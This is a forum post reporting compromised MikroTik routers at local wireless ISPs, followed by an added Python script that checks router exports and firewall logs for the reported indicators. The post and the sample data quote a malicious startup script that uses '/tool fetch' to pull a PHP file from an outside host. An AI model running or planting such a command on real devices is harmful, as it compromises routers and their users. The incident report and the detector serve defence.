Do not know if it is related to this particular botnet, but I found a local WISP I help from time to time had some hacked Mikrotiks.
Symptoms were as follows:
RouterOS version 6.34.x or lower
Multiple outbound connections to ports 8291 (WinBox) and 7547 (tr069)
socks proxy enabled
system scheduler set to run script on startup
contents of script were:
/tool fetch address=18.104.22.168 port=2008 src-path=/mikrotik.php
Found said php file in files on infected Mikrotiks
Stopped digging at that point and informed WISP, and helped to mitigate the issue.
Also found similar traffic on a second local WISP, informed them as well.
I was very concerned because these were both my main and backup internet connections.
Upon further investigation I found similar traffic coming in from upstream of my #1 provider, informed the carrier who delivers backbone to both providers a week ago.
Still getting hit pretty hard with incoming traffic that matches the pattern; firewall rules I set up on WISP #1's main router are holding for now...
Southwest Colorado USA
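The indicators listed in the post (old RouterOS, socks proxy enabled, a startup scheduler entry that runs /tool fetch, and outbound connections to 8291/7547) are easy to check for mechanically. The following is an added example, not code from the post or from MikroTik: it parses a constructed RouterOS "/export" excerpt and a few constructed firewall log lines and reports which indicators are present. The export text, the IP addresses, the scheduler name and the log format are all made up for the example; the "6.34.x or lower" threshold comes from the post.

```python
import re
import shlex

# Constructed "/export" excerpt imitating the post's indicators.
# The version, the address and the scheduler name are made up.
SAMPLE_EXPORT = """\
# jan/01/2018 12:00:00 by RouterOS 6.33.5
/ip socks
set enabled=yes port=1080
/system scheduler
add interval=0s name=U6 on-event="/tool fetch address=198.51.100.7 port=2008 src-path=/mikrotik.php" start-time=startup
add interval=1d name=backup on-event="/system backup save name=daily" start-time=03:00:00
"""

# Constructed firewall log lines (assumed format of a logged outbound rule).
SAMPLE_LOG = [
    "jan/02 10:15:00 firewall,info outbound: in:bridge out:ether1, proto TCP (SYN), 10.0.0.5:51234->203.0.113.9:8291, len 60",
    "jan/02 10:15:01 firewall,info outbound: in:bridge out:ether1, proto TCP (SYN), 10.0.0.5:51235->203.0.113.10:7547, len 60",
    "jan/02 10:15:02 firewall,info outbound: in:bridge out:ether1, proto TCP (SYN), 10.0.0.7:44000->203.0.113.11:443, len 60",
    "jan/02 10:15:03 firewall,info outbound: in:bridge out:ether1, proto TCP (SYN), 10.0.0.5:51236->203.0.113.12:8291, len 60",
]

AFFECTED_MAX = (6, 34)           # post: RouterOS 6.34.x or lower was affected
SUSPECT_PORTS = {8291, 7547}     # WinBox and TR-069, as in the post


def parse_version(export_text):
    """Return the RouterOS version from the export header, e.g. (6, 33, 5)."""
    m = re.search(r"by RouterOS (\d+(?:\.\d+)*)", export_text)
    return tuple(int(p) for p in m.group(1).split(".")) if m else None


def parse_export(export_text):
    """Yield (section, verb, {param: value}) for each add/set line."""
    section = None
    for raw in export_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("/"):
            section = line             # e.g. "/system scheduler"
            continue
        tokens = shlex.split(line)     # keeps quoted on-event scripts whole
        params = {}
        for tok in tokens[1:]:
            if "=" in tok:
                key, value = tok.split("=", 1)
                params[key] = value
        yield section, tokens[0], params


def find_indicators(export_text):
    """Return a list of human-readable findings matching the post's symptoms."""
    findings = []
    version = parse_version(export_text)
    if version and version[:2] <= AFFECTED_MAX:
        findings.append("old RouterOS " + ".".join(map(str, version)))
    for section, _verb, params in parse_export(export_text):
        if section == "/ip socks" and params.get("enabled") == "yes":
            findings.append("socks proxy enabled")
        if section == "/system scheduler":
            script = params.get("on-event", "")
            if "/tool fetch" in script and params.get("start-time") == "startup":
                findings.append(
                    "startup scheduler '%s' runs: %s" % (params.get("name"), script))
    return findings


def outbound_scan_sources(log_lines, min_targets=2):
    """Map each internal source to the number of distinct hosts it contacted
    on 8291/7547; only sources with at least min_targets are returned."""
    pat = re.compile(r"(\d+\.\d+\.\d+\.\d+):\d+->(\d+\.\d+\.\d+\.\d+):(\d+)")
    targets = {}
    for line in log_lines:
        m = pat.search(line)
        if m and int(m.group(3)) in SUSPECT_PORTS:
            targets.setdefault(m.group(1), set()).add(m.group(2))
    return {src: len(dsts) for src, dsts in targets.items() if len(dsts) >= min_targets}


if __name__ == "__main__":
    for f in find_indicators(SAMPLE_EXPORT):
        print("config:", f)
    for src, n in outbound_scan_sources(SAMPLE_LOG).items():
        print("traffic: %s contacted %d hosts on WinBox/TR-069 ports" % (src, n))
```

To use it on a real router, paste the output of "/export" into SAMPLE_EXPORT (or read it from a file) and feed lines from a logged outbound firewall rule to outbound_scan_sources; the log regex assumes the "src:port->dst:port" form that RouterOS firewall logging produces, so adjust it if your log prefix differs.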